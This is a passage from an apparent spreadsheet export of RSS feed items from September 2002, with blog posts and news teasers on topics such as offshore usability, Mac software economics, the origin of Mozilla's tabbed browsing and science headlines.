Date: Not suppliedJakob Nielsen on Offshore Usability[1]: "To save costs, some companies are 
outsourcing Web projects to countries with cheap labor. Unfortunately, these 
countries lack strong usability traditions and their developers have limited 
access -- if any --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can't get things done 
like this. A good project team relies on hundreds of small interactions a day. 
Here in the Fog Creek offices, we have 10 small conversations about FogBUGZ 3.0 
development every day. What I don't understand is people who think it's OK to move the developers ten 
time zones away from their managers and expect good results. Those same people 
would scream bloody murder if you told them that you were going to 
send the whole _management_ team to Bangalore or Beijing.[1] http://www.useit.com/alertbox/20020916.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020913.html
Date: Not suppliedJohn Robb has an interesting perspective on trust-based, targetted advertising
[1] based on his experiences at Gomez during the heady days of the Internet 
gold rush. Nobody believes advertisements[2] any more. There's a lot of evidence that 
advertising just doesn't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either.[1] http://jrobb.userland.com/stories/2002/09/11/trustbasedAdvertising.html
[2] http://www.amazon.com/exec/obidos/ASIN/0060081988/ref=nosim/joelonsoftware
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85378428
Date: Not suppliedI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ludicrous.[1] http://www.parentstv.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8274140,1717/
Date: 2002-09-26T12:27:22+01:00(Some Ugly Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8269407,1717/
Date: 2002-09-26T09:23:43+01:00(Some Stoner)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8269406,1717/
Date: 2002-09-26T09:23:44+01:00[IMG: http://www.newsisfree.com/Images/fark/bostonglobe.gif ([BostonGlobe])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020910.html
Date: Not suppliedDaniel Berlinger has noticed[1] that Mac software shops are starting to move to 
OS X-only development. This makes sense, for two reasons. First, most people 
who pay for software have new computers. So while OS X may only have a small 
fraction of the installed base, it has the majority of the population of people 
who are opening their wallets. Second, if OS X isn't successful, the Mac is _
over_. It's not like System 9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Macs[2] (about 3.5%) and the market share 
of Netscape[3] (about 3.4%), that is not a silly comparison.) Robb Beal wrote[4]: "Try this test. Go to a venture firm, angel, or big company 
with a Mac OS X product/concept/prototype. Do they consider the fact that it's 
a Mac application a net plus? (No.)" Well _duh_. Your product would have to 
appeal to _25 times more Mac _users_ _[as a percentage] than Windows users just 
to break even. In other words, if your Windows product appeals to 1 in 100 
Windows users, you have to appeal to 25 in 100 Mac users to make the same 
amount of money. Now, you may want to make an _emotional_ appeal to developing for the Mac. 
That's fine. If you like Macs and you're doing it for fun, more power to ya. But as long as we're talking _investment_, you have to tell me why you're going 
to get 25 times as many users. Maybe there's less competition in your category 
on the Mac; maybe you're in a niche like graphics where it seems like Macs 
dominate (they don't, it just seems that way because the elite graphics people 
in big American cities use Macs); maybe your product can't sell to mixed 
environments unless it runs everywhere. But if you want to make an investment 
in Mac software be prepared to demonstrate how you're going to overcome that 
magic 25 multiplier.[1] http://archipelago.phrasewise.com/2002/09/10
[2] http://maccentral.macworld.com/news/0207/03.marketshare.php
[3] http://websidestory.com/cgi-bin/wss.cgi?corporate&amp;news&amp;press_1_193
[4] http://radio.weblogs.com/0001123/2002/04/10.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8268032,1717/
Date: 2002-09-26T08:22:37+01:00[IMG: http://www.newsisfree.com/Images/fark/yahoonews.gif ([Yahoo])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85377159
Date: Not suppliedTest your knowledge with this set of movie quotes. I'll be back in a couple of 
days with the answers.
-  Did IQs just drop sharply while I was away? -  Any fool can get into college. Only a select few can say the same about 
Amanda Jones.-  My dear, since Eve picked the apple, no woman has ever been taken entirely 
unawares.-  This is Tommy. He tells people he's named after a gun, but I know he's named 
after a famous 19th century ballerina.-  When one woman strikes at the heart of another she seldom misses, and the 
wound is invariably fatal.-  I've never been alone with a man before, even with my dress on. With my 
dress off, it's _most_ unusual.-  You're nothing to me now. You're not a brother, you're not a friend. I don't 
want to know you or what you do. I don't want to see you at the hotels, I don't 
want you near my house. When you see our mother, I want to know a day in 
advance, so I won't be there.-  Kids: 10 seconds of joy, 30 years of misery.-  Sucking all the marrow out of life doesn't mean choking on the bone.-  A hundred million terrorists in the world and I gotta kill one with feet 
smaller than my sister.-  Mother, I do not need a blind date. Particularly not with some verbally 
incontinent spinster who drinks like a fish, smokes like a chimney and dresses 
like her mother.-  Have you ever seen a body like this before in your life?
She happens to be my daughter.
Oh. Then I guess you have.-  I'm not a smart man, but I know what love is.-  Of course, you won't be able to lie on your back for a while but then you 
can lie from any position, can't you?-  The fact that you prevented it from happening doesn't change the fact that 
it was going to happen.-  Women need a reason for having sex. Men just need a place.-  You are not special. You are not a beautiful or unique snowflake. You are 
the same decaying organic matter as everything else.-  Looks like I picked the wrong week to stop sniffing glue! -  The issue is not whether you are paranoid. Look around you Lenny. The issue 
is whether you are paranoid enough.-  Inconceivable!
You keep using that word. I do not think it means what you think it means. Enjoy.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8256507,1717/
Date: 2002-09-25T23:11:07+01:00[IMG: http://www.newsisfree.com/Images/fark/msnbc2.gif ([MSNBC])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,7764729,159/
Date: 2002-09-11T22:41:04+01:00In the second of our series from the GDC Europe, we talk with Microsoft's Bill 
Fulton about usability testing for games, SCEE's Zeno Colaco about pitching 
publishers, and Harvey Smith of Ion Storm about emergent game design.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8256508,1717/
Date: 2002-09-25T23:11:06+01:00(Some Gentleman)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8278079,215/
Date: 2002-09-26T14:43:59+01:00*Comment:* The success of the mass demonstrations against the Vietnam war show 
why this Saturday's Stop the War march is so important, says *Paul Foot*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,6436947,159/
Date: 2002-08-01T09:04:55+01:00This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</si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8276089,215/
Date: 2002-09-26T13:42:55+01:00*Money:* Further evidence of a slowdown in the housing market emerged today as 
figures revealed a 15% drop in the total value of mortgages approved during 
August.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8268033,1717/
Date: 2002-09-26T08:22:36+01:00[IMG: http://www.newsisfree.com/Images/fark/scotsman.gif ([The Scotsman])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: e59c6ca5938fc27a6995e30fc10b6482
Date: Not suppliedIt came out a while ago, but Ben Hammersley reviewed AmphetaDesk and a few 
other free aggregators in his Guardian article, Working the web: Newsreaders[1]
. In more timely news, OSDir[2], a repository of "stable, open source apps", 
has reviewed AmphetaDesk[3] and labels it an 'OSDir.com preferred' app. They 
also give you the ability to rate AmphetaDesk[4] on a scale of 1-10. You can 
see the current rating here[5].[1] http://www.guardian.co.uk/online/story/0,3605,781838,00.html
[2] http://www.osdir.com/
[3] http://osdir.com/modules.php?op=modload&amp;name=News&amp;file=article&amp;sid=34&amp;mode=thread&amp;order=0&amp;thold=0
[4] http://osdir.com/modules.php?op=modload&amp;name=Downloads&amp;file=index&amp;req=ratedownload&amp;lid=28&amp;ttitle=%3Ch3%3EShow%20Your%20Support%20for%20Amphetadesk%3C/h3%3E
    %3Ch3%3EShow%20Your%20Support%20for%20Amphetadesk%3C/h3%3E"
[5] http://osdir.com/modules.php?op=modload&amp;name=Downloads&amp;file=index&amp;req=viewdownloaddetails&amp;lid=28&amp;ttitle=AmphetaDesk
    AmphetaDesk"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=60761
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=60761
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: 4538e94b3b2c6b19041756b37b1f9916
Date: Not suppliedSince the AmphetaDesk source code is so easily modifiable on any platform, I've 
been seeing some interesting hacks and modifications lately. The most powerful 
of them is l.m. orchard's newest template[1], which provides an insane amount 
of new features, including hiding old items, click counting, and an outline 
based format. More than likely, a revised version of his hack will appear as a 
selectable template in the next version (AmphetaDesk v0.94). Also of interest is Brian Cantoni's FTPStore[2]: _"FTPstore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sync."_ It's a major improvement for AmphetaDesk users with multiple machines.[1] http://www.decafbad.com/news_archives/000228.phtml
[2] http://www.cantoni.org/software/amphetadesk.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=58104
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=58104
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=54458
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=54458
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=49760
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=49760
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=52887
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=52887
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48393
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48393
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000187.html
Date: 2002-09-23T11:47:57-08:00Got a stock ticker for which you'd like to have an RSS news feed? Help test the 
beta RSS feeds we've put up o Yahoo Finance. Take your favorite ticker, say 
YHOO, and put this URL in your news aggregator:...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48335
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48335
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8206955,1440/
Date: Not suppliedNigerian researchers say their study negates arguments used to defend the 
practice, which is still widespread in Africa
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000185.html
Date: 2002-09-19T22:30:15-08:00Dan thinks it is evolution. To me it's stupidity, laziness, and apathy. I have 
to respectfully disagree. Or maybe I'm just being stubborn. For whatever 
reason, whenever I get e-mail from someone who: Writes "ur" instead of "you 
are" or...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251864,1440/
Date: Not suppliedA hardy microbe that can withstand huge doses of radiation is most likely to 
have evolved this ability on the Red Planet, argue scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8015194,1440/
Date: Not suppliedAn influential think tank warns that "regime change" could disperse weapons 
stockpiles into the murky world of global terrorism
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8015193,1440/
Date: Not suppliedA new analysis of satellite images shows regeneration of once arid lands across 
the southern Sahara, making farming viable again
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8052858,1440/
Date: Not suppliedMales suffer more parasitic infections than females - this could help explain 
why they die younger, say researchers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8199104,1440/
Date: Not suppliedMillions of tiny fat droplets are thought to damage the brains of most heart 
surgery patients - sonic waves may help
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8045344,1440/
Date: Not suppliedOver the last century, an "extra" 35,000 suicides occurred under Tory rule in 
the UK - a similar effect is apparent in Australia
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251867,1440/
Date: Not suppliedA genetically engineered yellow fever vaccine shows promise in animal tests - 
if fast-tracked it could soon be available for humans
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8052859,1440/
Date: Not suppliedBritish scientists vow to have their robotic probe ready for launch in 2003, 
amid concerns over the project's finances
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8086489,1440/
Date: Not suppliedShining a laser through a cheap, little disc can generate an immensely powerful 
secret code - they could be used to secure credit cards
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8171675,1440/
Date: Not suppliedRings around distant stars betray small rocky planets, say astronomers, 
suggesting a census will soon be possible
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8182249,1440/
Date: Not suppliedWe are more unique than previously thought, according to new comparisons with 
the genetic code of our closest relatives
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8132228,1440/
Date: Not suppliedThe controversial claim could be evidence of hidden extra dimensions and help a 
'theory of everything' fall into place
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251866,1440/
Date: Not suppliedNew laws, prompted by earlier cloning claims, promise 10 years in jail for 
offenders - but the blanket ban angers scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8052857,1440/
Date: Not suppliedThe faint microwave afterglow of the Big Bang is polarised - the discovery 
should help probe the birth of the Universe
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8062538,1440/
Date: Not suppliedTests for the infectious agent in people without symptoms do not reduce the 
deaths predicted - larger studies are "urgently needed"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8086490,1440/
Date: Not suppliedThe cargo vessel ran aground off a World Heritage conservation site in South 
Africa - raging fires are hampering salvage attempts
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8078047,1440/
Date: Not suppliedUS officials have all but confirmed that the virus - which has killed 84 people 
- can be transmitted via donated blood
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8081289,1440/
Date: Not suppliedThe US Air Force is set to test the steering and control technique first used 
during the Wright brothers' famous flight in 1903
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8167824,1440/
Date: Not suppliedIt will be the only US state where medical researchers can use public funds to 
create embryos and extract stem cells
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251865,1440/
Date: Not suppliedA subconsciously perceptible pattern explains the mysterious appeal of a famous 
old Japanese garden, say researchers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8171676,1440/
Date: Not suppliedDetailed guidelines for vaccinating all 288 million citizens within five days 
of an outbreak are being dispatched to every state
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8202806,1440/
Date: Not suppliedIt claims Iraq is ready to use chemical weapons and is pursuing long-range 
missiles, but it lacks dramatic new evidence likely to win over war sceptics
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251868,1440/
Date: Not suppliedTechnical problems beat a transatlantic record attempt, as the weather beats an 
altitude record attempt - for now
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8045341,1440/
Date: Not suppliedGory hieroglyphs found on a Guatemalan pyramid support the idea of a superpower 
struggle at the civilisation's peak
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8015195,1440/
Date: Not suppliedResearchers say they have made at least 50,000 atoms of cold antihydrogen - 
analysing them may reveal why antimatter is so rare
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85443744
Date: Not suppliedI just finished reading an article about Mozilla[1] for Salon.com[2]. This 
excerpt was rather amusing._It is a good question, because in almost every way, Mozilla is a better 
browser than Navigator. For example, Netscape's best new feature, tabbed 
browsing -- which lets you have several Web pages open in the same browser 
window, and allows you to bookmark all the pages under one name -- was in 
Mozilla many months ago, and the Mozilla project that created it (called 
MultiZilla) already has an improved version available. When asked about this, 
Yecies, of Netscape, said, "That's true, but the engineer who's working on it 
[for Mozilla] is a Netscape employee. It was always done with the intention of 
fostering general browsing usability for Netscape." 
_
Yes, ok, I suppose that's true if by "Netscape employee" you really meant 
"Apple employee." and by "always done with the intention of fostering general 
browsing usability for Netscape" you meant "was done in a weekend for Mozilla 
because I thought MultiZilla was cool." Here's how the whole tabbed browsing thing happened. One night I finally 
downloaded an extension called MultiZilla (go check it out on mozdev.org[3]. I 
was particularly impressed with a feature contained in MultiZilla called tabbed 
browsing. I started doing research and discovered NetCaptor[4],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NetCaptor's more obscure 
capabilities (like sticky names and tab locking). The second concern was that 
the tab behavior wasn't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didn't degrade performance in the 
single tab case, I checked it in as an experiment.The response was overwhelming, as were the bugs that started being filed. So 
much so that at first I wanted to back tabbed browsing out of the tree. I was 
overruled by Mozilla, which turned out to be a good thing for all I think. :) 
Even with all the excitement and hoopla surrounding the advent of tabbed 
browsing on the engineering side (and in the Mozilla community), Netscape still 
didn't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know what to make 
of it.Only after the press raved about it did Netscape really jump on board. I'm sure 
Netscape is doing the same thing now with popup blocking. Can't you just see it 
now? We'll have a Popup Manager, and a Manager to manage the Popup Manager, and 
twenty-seven preferences for fine-grained control of all aspects of popups. Can you believe how disfunctional Netscape is? When their engineers say "you 
should do this" or "you should do that", they get completely ignored (or blown 
off), but when CNet says "We didn't like this, or we didn't like that.", 
Netscape scurries to meet their demands. That is simply pathetic.[1] http://archive.salon.com/tech/feature/2002/09/10/browser_wars/
[2] http://www.salon.com
[3] http://www.mozdev.org
[4] http://www.netcaptor.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8276087,215/
Date: 2002-09-26T13:42:57+01:00*Business:* Black entrepreneurs face more problems in raising money for 
start-ups than white or Asian counterparts, new report says.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8106968,1440/
Date: Not suppliedA patented system allows drivers of hushed modern vehicles to enjoy the throaty 
engine sounds of classic cars, all in synch with your driving
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000190.html
Date: 2002-09-25T22:21:15-08:00So, I called the power company promptly at 8am to find out what they were 
smoking. The allowed me to pay by credit card so that I could get reactivated 
today (and pay a $40 "reconnection fee" for the privilege)....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000191.html
Date: 2002-09-25T22:31:04-08:00I've added a new blog category: Yahoo. Why? Because occasionally I post stuff 
about work, so I might as well categorize. Plus, some private e-mail has 
convinced me that it might be a good idea. (You know who you are....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8268029,1717/
Date: 2002-09-26T08:22:40+01:00[IMG: http://www.newsisfree.com/Images/fark/azcentral.gif ([AZCentral])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8260638,1717/
Date: 2002-09-26T02:16:24+01:00(Some Comic Book Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000193.html
Date: 2002-09-25T22:51:45-08:00First of all, thanks for all the great feedback. I see that a lot of folks are 
pulling it now. I'm working on some stats. It'll be interesting to see which 
stocks bloggers tend to watch, which aggregators they use,...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000194.html
Date: 2002-09-25T22:56:08-08:00Matt describes something I've been experiencing a lot recently: You know you 
read too many primary sources when you read an article on slashdot and think, 
"I read that yesterday." Yeah, ever since I got into weblogs. I don't rely...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8260640,1717/
Date: 2002-09-26T02:16:22+01:00(Arizona Republic)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8259315,1717/
Date: 2002-09-26T01:15:07+01:00[IMG: http://www.newsisfree.com/Images/fark/pravda.gif ([Pravda])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8259314,1717/
Date: 2002-09-26T01:15:08+01:00(me)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8272607,1717/
Date: 2002-09-26T11:26:11+01:00(NY Daily News)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,6503039,159/
Date: 2002-08-03T08:11:17+01:00Back when 64KB was more memory than any computer would ever need, there was a 
time when memory managers didnï¿½t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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8279315,1717/
Date: 2002-09-26T15:30:15+01:00(creationists.org)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,7132396,159/
Date: 2002-08-22T03:21:04+01:00Scripting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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8272608,1717/
Date: 2002-09-26T11:26:10+01:00[IMG: http://www.newsisfree.com/Images/fark/cleveland.gif ([Cleveland])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000184.html
Date: 2002-09-19T21:59:17-08:00It appears that hfb has an evil toilet. It's a good thing that Josh never met 
it. She also found some amusing lines to use at work. I could use a few of 
those myself. It's not like we didn't...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,7506698,159/
Date: 2002-09-04T02:10:04+01:00With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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8279860,215/
Date: 2002-09-26T15:44:55+01:00*The Northerner:* Subscribe to our free email round-up of the best of the 
northern English press.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=59390
Date: Not suppliedhttp://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=59390
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8263548,215/
Date: 2002-09-26T04:32:57+01:00*Books:* Fay Weldon may have opted to be writer in residence at the Savoy Hotel 
in London, but Will Self has chosen a different kind of residency.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8274142,1717/
Date: 2002-09-26T12:27:20+01:00[IMG: http://www.newsisfree.com/Images/fark/sbb.gif ([Sports by Brooks])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8264811,1717/
Date: 2002-09-26T05:19:10+01:00(whatever-dude)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85497407
Date: Not suppliedDisney's put up a little brochureware site about its forthcoming (and very 
exciting!) film based on the Haunted Mansion ride, a followup to the Country 
Bears movie (I may be the only adult in the world who enjoyed that one). All 
that's there now is a downlaodable poster, which is pretty keen, except for 
this supercillious bit of legal crapola you have to click through to get at it. 
    [IMG: http://www.craphound.com/images/hmsign.jpg] Disney Pictures hereby 
    grants you a limited, nonexclusive, nontransferable, one-year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Link[1] Discuss[2] (_Thanks, Amanda[3]!_)[1] http://disney.go.com/disneypictures/hauntedmansion/index.html
[2] http://www.quicktopic.com/boing/H/rbEFbqvNpUSV
[3] http://monkeygirl.blogspot.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85497383
Date: Not suppliedThis is the headline of the month, possibly the year: "Doctors Grow Pig Teeth 
in Rat Intestines." Do we even need to read the story to understand it? It's 
like a freaking _haiku_ of near-singularity, future-shocky wonderment!     U.S. doctors said on Thursday they have managed to grow living pig teeth in 
    rats, a feat of biotechnology that experts said could spark a dental 
    revolution.     Researchers at Boston's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Link[1] Discuss[2] (_Thanks, Dave[3]!_)[1] http://story.news.yahoo.com/news?tmpl=story&amp;ncid=585&amp;e=1&amp;cid=585&amp;u=/nm/20020926/sc_nm/health_teeth_dc
[2] http://www.quicktopic.com/boing/H/88cUs6CumjiX
[3] http://www.remtullaeurorscg.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8305901,1717/
Date: 2002-09-27T09:52:32+01:00(The Japan Times)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8294463,1717/
Date: 2002-09-27T00:42:17+01:00(Some albino rhino)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8293089,1717/
Date: 2002-09-26T23:40:19+01:00[IMG: http://www.newsisfree.com/Images/fark/abcnews.gif ([ABC News])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8296987,1717/
Date: 2002-09-27T02:45:51+01:00(DeKalb Daily Chronicle)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8288879,1717/
Date: 2002-09-26T20:37:17+01:00[IMG: http://www.newsisfree.com/Images/fark/aicn.gif ([AintItCoolNews])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/26.html
Date: 2002-09-26T16:16:43-08:00Last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that's 
not quite true. Viridiana dragged me there. Look how messed up that is. I only 
go when I'm in pain, and...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8304313,1717/
Date: 2002-09-27T08:51:29+01:00[IMG: http://www.newsisfree.com/Images/fark/cbc.ca.gif ([CBC])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8290377,1717/
Date: 2002-09-26T21:38:23+01:00[IMG: http://www.newsisfree.com/Images/fark/cnn.gif ([CNN])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8304314,1717/
Date: 2002-09-27T08:51:28+01:00(orlando sentinel)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8305902,1717/
Date: 2002-09-27T09:52:31+01:00(Stuff.co.nz)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8293091,1717/
Date: 2002-09-26T23:40:17+01:00(Bath Chronicle)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000197.html
Date: 2002-09-26T21:06:10-08:00As many of you have noticed, the feeds are off now. Will they be back on? I 
hope so. Soon? I'm not sure. What I will (and can) say is that the experience 
was very valuable for us....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/24.html
Date: 2002-09-24T02:35:59-08:00You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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8296986,1717/
Date: 2002-09-27T02:45:52+01:00(Some Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000198.html
Date: 2002-09-26T23:32:18-08:00It seems that my body runs on a 25-26 hour clock, usually tending closer to 26 
hours. This really drives me nuts sometimes. Scheduling is a real pain in the 
ass at times. Like when I'm not even close to...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8298180,1717/
Date: 2002-09-27T03:46:29+01:00[IMG: http://www.newsisfree.com/Images/fark/xent.gif ([X-Entertainment])]
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8289788,1440/
Date: Not suppliedPeople using the drug for just one night could be affected, researchers claim, 
but others experts are highly sceptical
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/20.html
Date: 2002-09-20T17:10:35-08:00Yesterday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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/12.html
Date: 2002-09-12T04:04:00-08:00It seems like ATTWS will offer a service that'll tell you where your friends 
(or children or spouse or whatever) are ... I haven't seen it announced, but 
from their "Explanation of Rates and Charges. "Find Friends service will only 
locate a compatible mobile device with mMode service that (1) has granted you 
permission, (2) is turned on, (3) is registered on the AT&amp;T Wireless GSM/GPRS 
network, and (4) has not activated Be Invisible. Location services only provide 
the location...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/07.html
Date: 2002-09-07T22:25:08-08:00Rael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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/27.html#advanced_css_lists
Date: 2002-09-27T23:22:56-05:00_Mark Newhouse_: CSS Design: Taming Lists[1]. â€œI'll demonstrate how to 
use CSS to bring unwieldy lists under control. It's time for you to tell lists 
how to behave, instead of letting them run wild on your web page.â€[1] http://www.alistapart.com/stories/taminglists/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357895,215/
Date: 2002-09-29T00:39:59+01:00*World latest:* Ivory Coast coup could involve rest of the region in a 
bloodbath.
</t>
  </si>
  <si>
